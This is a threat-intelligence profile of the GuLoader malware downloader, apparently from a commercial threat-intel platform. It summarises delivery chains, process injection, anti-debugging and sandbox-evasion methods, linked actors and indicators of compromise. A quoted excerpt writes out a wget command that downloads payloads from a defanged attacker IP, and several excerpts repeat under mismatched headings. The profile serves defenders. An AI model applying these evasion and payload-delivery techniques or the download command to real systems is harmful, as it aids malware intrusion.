GuLoader
GuLoader is a shellcode-based malware downloader/dropper first observed in December 2019 and still under active development. It is widely used in phishing-driven intrusion chains and other malicious delivery workflows to fetch, decrypt, and execute follow-on payloads in memory while minimizing on-disk artifacts. Reported infection vectors in the provided content include phishing emails, malicious web links, embedded macros in malicious Word documents, tax-themed phishing campaigns, malicious LNK-based delivery chains, and exploitation of WinRAR CVE-2023-38831 via crafted ZIP archives. Current variants described in the content include VBScript- and NSIS-based forms; earlier versions were implemented as VB6 applications.
Its primary role is payload delivery. The content explicitly states GuLoader has been used to distribute Formbook, XLoader, Remcos, 404Keylogger, LokiBot, AgentTesla, NanoCore, NetWire, VIPKeylogger, PhantomStealer, Rhadamanthys, and Makop ransomware payloads, and has also been referenced alongside DarkGate, DbatLoader, Amadey, Latrodectus, BruteRatel C4, and other loaders in phishing ecosystems. In one Microsoft-observed March 2025 tax-themed campaign, a .bat file downloaded GuLoader, which then installed Remcos. Other cited campaigns include active 2026 credential-theft operations targeting primarily Italian businesses, where NSIS-wrapped GuLoader samples delivered Agent Tesla and VIPKeylogger.
GuLoader is characterized by strong evasion and in-memory execution. It can inject shellcode into a donor process started in a suspended state and has used RegAsm as a donor process. The content also describes process hollowing and injection behavior using MapViewOfSection and WriteProcessMemory-based hollowing. GuLoader commonly stores encrypted shellcode or payloads on public cloud services such as Google Drive, and more recent reporting also mentions OneDrive. Payloads are decrypted and executed in memory, with encrypted payloads stored without PE headers to reduce antivirus and cloud-scanning visibility. One analyzed VBScript chain used obfuscated PowerShell, saved downloaded data to %APPDATA%\Umig.For, decoded a shellcode blob, and transferred execution via CallWindowsProc; on 64-bit systems it invoked SysWOW64 PowerShell because the shellcode required a 32-bit process.
The malware includes extensive anti-analysis and obfuscation. Reported techniques include sandbox evasion through VM and hypervisor checks, timing checks with RDTSC/CPUID, QEMU artifact checks, window counting, driver enumeration, and installed-software enumeration; anti-debugging via hooks on DbgBreakPoint and DbgUiRemoveBreakIn and use of NtSetInformationThread with ThreadHideFromDebugger; encrypted strings and URLs with runtime reconstruction of http/https schemes; and exception-driven control-flow obfuscation using a vectored exception handler (VEH). Since late 2022, GuLoader has deliberately raised access-violation, single-step, and breakpoint exceptions and used RtlAddVectoredExceptionHandler to compute the next execution address dynamically. The VEH logic checks debug registers, can crash when hardware breakpoints are present, and scans for software breakpoints, complicating static and dynamic analysis.
The content links GuLoader to financially motivated cybercrime activity rather than a single exclusive threat actor. It is associated with phishing campaigns attributed in one case to initial access broker Storm-0249, with commodity malware delivery operations, and with campaigns abusing legitimate SMB/shared hosting and cloud infrastructure. Targeting described in the content is broad and opportunistic, including Italian and international businesses, tax-themed phishing recipients, and victims of credential-theft and RAT-delivery campaigns.
High-confidence indicators explicitly mentioned in the content include: GuLoader sample SHA-256 350c7cdc9d10c12ae1c490890975e387421616170f710ebbf9fa6d29fbf4b7dc (Ustabil.exe); GuLoader sample SHA256 5fcfdf0e241a0347f9ff9caa897649e7fe8f25757b39c61afddbe288202696d5; VBScript MD5 9623c946671c6ec7a30b7c45125d5d48; shellcode MD5 141da1d174041a32cc6a234d80d0b850; encrypted Remcos payload MD5 bcea24378a2134429ca82164827f1c25; decrypted Remcos payload MD5 d5335a1ec161a8430e564bc66c16f894; NSIS MD5 40b9ca22013d02303d49d8f922ac2739; encrypted shellcode MD5 c6e068ce04fb4959e2e6daaebac8d893; decrypted Formbook payload MD5 66274853e6f35e3fef0645a6587cb892; Google Drive URLs hxxps://drive.google.com/uc?export=download&id=1BZ2BJVzqOMDwarpjiTzKEiwa42W1Dj9q and hxxps://drive.google.com/uc?export=download&id=1soTWv6y3rkBBbmMcBMOwovCqXxU4UQRB; FTP infrastructure holzbrenzii[.]com (198[.]27[.]80[.]139) and corwineagles[.]com (162[.]241[.]123[.]75); SMTP infrastructure mail[.]onionmail[.]org / onionmail[.]org; and Telegram bot token 8729572560:AAH7-pGiLevApfXHCGKQfSyCpF9fVTqxN9Q with chat ID 8277275661, noted as revoked after detection.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Cybercriminals exploited this vulnerability to deliver various malware families, including DarkMe and GuLoader, by crafting ZIP archives with spoofed extensions, which were then distributed on trading forums. | Group-IB Threat Intelligence unit discovered a zero-day vulnerability, CVE-2023-38831, in WinRAR, a popular compression tool. Cybercriminals exploited this vulnerability to deliver various malware families, including DarkMe and GuLoader, by crafting ZIP archives with spoofed extensions.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Earlier this April, the Redmond-based company warned of several phishing campaigns leveraging tax-related themes to deploy malware such as Latrodectus, AHKBot, GuLoader, and BruteRatel C4 (BRc4). The phishing pages, it added, were delivered via RaccoonO365, with one such campaign attributed to an initial access broker called Storm-0249.
"...Visual Basic loaders —including the Guloader malware dropper discovered by Proofpoint on December 2019."
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniquescampaigns using RaccoonO365 have been active since September 2024. These attacks typically mimic trusted brands like Microsoft, DocuSign, SharePoint, Adobe, and Maersk in fraudulent emails, tricking them into clicking on lookalike pages that are designed to capture victims' Microsoft 365 usernames and passwords.
MITRE ATT&CK Mapping Tactic Technique ID Implementation Initial Access Spearphishing Attachment T1566.001 .bat/.exe email attachments with BEC lures
Execution
6 techniquesThe purpose of this code is to call the PowerShell interpreter and pass it the code of the script collected in the “pa0” variable as a parameter.
Currently, the most common versions are based on the VBScript and the NSIS installer... VBScript itself contains only a small obfuscated PowerShell script and a lot of junk code.
The content repeatedly mentions malicious macros in Word/Excel documents, such as "enable macros," "embedded macros," and "macro-enabled documents."
MITRE ATT&CK Mapping Tactic Technique ID Implementation Execution Native API T1106 System.dll calls VirtualAlloc, CallWindowProcA
The content repeatedly describes victims being lured into opening malicious attachments, enabling macros, launching installers, clicking embedded files/links, or otherwise directly executing malicious content.
Earlier this April, the Redmond-based company warned of several phishing campaigns leveraging tax-related themes to deploy malware such as Latrodectus, AHKBot, GuLoader, and BruteRatel C4 (BRc4). The phishing pages, it added, were delivered via RaccoonO365
Persistence
2 techniquesAcross the content, malware repeatedly 'adds Registry Run keys', 'creates Registry entries', 'modifies the Windows Registry', or 'overwrites registry keys' to maintain persistence.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder. | Examples include AppleSeed creating 'HKCU\Software\Microsoft/Windows\CurrentVersion\RunOnce', AvosLocker executed via the RunOnce Registry key, NanoCore creating a RunOnce key, and Raspberry Robin setting a RunOnce key.
Privilege Escalation
3 techniquesThe content repeatedly describes adversaries and malware injecting code, shellcode, DLLs, or payloads into legitimate processes such as svchost.exe, explorer.exe, iexplore.exe, wuauclt.exe, lsass.exe, and browser processes.
GuLoader has the ability to inject shellcode into donor processes that is started in a suspended state. Cardinal RAT injects into a newly spawned process created from a native Windows executable. Pandora can start and inject code into a new svchost process. ShadowPad has injected an install module into a newly created process.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder. | Examples include AppleSeed creating 'HKCU\Software\Microsoft/Windows\CurrentVersion\RunOnce', AvosLocker executed via the RunOnce Registry key, NanoCore creating a RunOnce key, and Raspberry Robin setting a RunOnce key.
Stealth
13 techniquesGuLoader’s payload is fully encrypted, including PE headers... Earlier versions of GuLoader were implemented as VB6 applications containing encrypted shellcode. Currently, the most common versions are based on the VBScript and the NSIS installer.
MITRE ATT&CK Mapping Tactic Technique ID Implementation Defense Evasion Binary Padding T1027.001 Single-byte fill files to inflate archive size
MITRE ATT&CK Mapping Tactic Technique ID Implementation Defense Evasion Software Packing T1027.002 NSIS wrapper as legitimate installer framework
"The .lnk file also includes an innocuous .pdf file that launches in parallel with the malicious activity"
MITRE ATT&CK Mapping Tactic Technique ID Implementation Defense Evasion Masquerading: Match Legitimate Extension T1036.008 .bat extension on PE executable
The content repeatedly describes adversaries and malware injecting code, shellcode, DLLs, or payloads into legitimate processes such as svchost.exe, explorer.exe, iexplore.exe, wuauclt.exe, lsass.exe, and browser processes.
GuLoader has the ability to inject shellcode into donor processes that is started in a suspended state. Cardinal RAT injects into a newly spawned process created from a native Windows executable. Pandora can start and inject code into a new svchost process. ShadowPad has injected an install module into a newly created process.
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
As in previous GuLoader versions, the shellcode implements a large number of anti-analysis techniques: Sandbox evasion techniques including: Scanning memory for VM-related strings. Checking if the hypervisor bit is enabled, using CPUID instruction... Measuring time, using RDTSC... Searching for QEMU related files... Counting the number of Windows... Checking if there are any VM-related drivers present... Enumerating installed software...
Checking if the hypervisor bit is enabled, using CPUID instruction... Searching for QEMU related files... Counting the number of Windows... Checking if there are any VM-related drivers present... Enumerating installed software...
the script allocates 2 memory areas, downloads the data from the link to Google Drive, and saves it to a temporary file “%APPDATA%\Umig.For”.
the loader... decrypts and runs it in memory without dropping the decrypted data to the hard drive.
Defense Impairment
2 techniquesAcross the content, malware repeatedly 'adds Registry Run keys', 'creates Registry entries', 'modifies the Windows Registry', or 'overwrites registry keys' to maintain persistence.
MITRE ATT&CK Mapping Tactic Technique ID Implementation Defense Evasion Subvert Trust Controls: Code Signing T1553.002 Fraudulent self-signed cert with DigiCert timestamp
Discovery
4 techniquesAs in previous GuLoader versions, the shellcode implements a large number of anti-analysis techniques: Sandbox evasion techniques including: Scanning memory for VM-related strings. Checking if the hypervisor bit is enabled, using CPUID instruction... Measuring time, using RDTSC... Searching for QEMU related files... Counting the number of Windows... Checking if there are any VM-related drivers present... Enumerating installed software...
Checking if the hypervisor bit is enabled, using CPUID instruction... Searching for QEMU related files... Counting the number of Windows... Checking if there are any VM-related drivers present... Enumerating installed software...
Enumerating installed software, using the MsiEnumProductsA and MsiGetProductInfoA.
Command and Control
3 techniquesThe most significant technical change is where the malware stores its core configuration. Rather than embedding C2 URLs as readable strings, the authors have moved that data into the .NET resource section, scrambled with XOR encoding.
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
Examples include: 'APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits,' 'APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads,' and many malware families used HTTP GET/POST or HTTPS to download additional payloads or files.
IOCs tracked for this family
32 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
58 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Mentioned as a malware family that uses the resource section to hide payloads.
Gremlin stealer uses the resource section to mirror the tactics of several high-profile malware families that frequently use this area for payload obfuscation, including: Agent Tesla, GuLoader, LokiBot, Quasar RAT.
Loader used in the shared delivery chain and campaign graph linking the AgentTesla and PhantomStealer deployments. It appears as a common delivery component rather than the final payload.
GuLoader is referenced as the delivery mechanism used to deploy Remcos RAT in the earlier phase of the campaign.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.